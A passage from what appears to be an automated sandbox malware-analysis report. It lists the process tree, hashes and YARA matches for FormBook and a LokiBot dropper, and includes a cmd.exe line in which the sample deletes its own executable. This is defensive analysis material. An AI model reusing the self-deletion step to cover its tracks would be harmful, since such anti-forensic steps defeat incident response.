                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                Analysis Process: explorer.exe PID: 3472 Parent PID: 1544

                                                General

                                                Start time:15:34:18
                                                Start date:25/02/2021
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:
                                                Imagebase:0x7ff693d90000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Analysis Process: rundll32.exe PID: 6456 Parent PID: 3472

                                                General

                                                Start time:15:34:30
                                                Start date:25/02/2021
                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                Imagebase:0xa90000
                                                File size:61952 bytes
                                                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.489632071.0000000000684000.00000004.00000020.sdmp, Author: Florian Roth
                                                • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000D.00000002.495263682.0000000004927000.00000004.00000001.sdmp, Author: Florian Roth
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                Analysis Process: cmd.exe PID: 6492 Parent PID: 6456

                                                General

                                                Start time:15:34:35
                                                Start date:25/02/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:/c del 'C:\Users\user\Desktop\dwg.exe'
                                                Imagebase:0x12c0000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Analysis Process: conhost.exe PID: 6500 Parent PID: 6492

                                                General

                                                Start time:15:34:36
                                                Start date:25/02/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7ecfc0000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                Disassembly

                                                Code Analysis

                                                Reset < >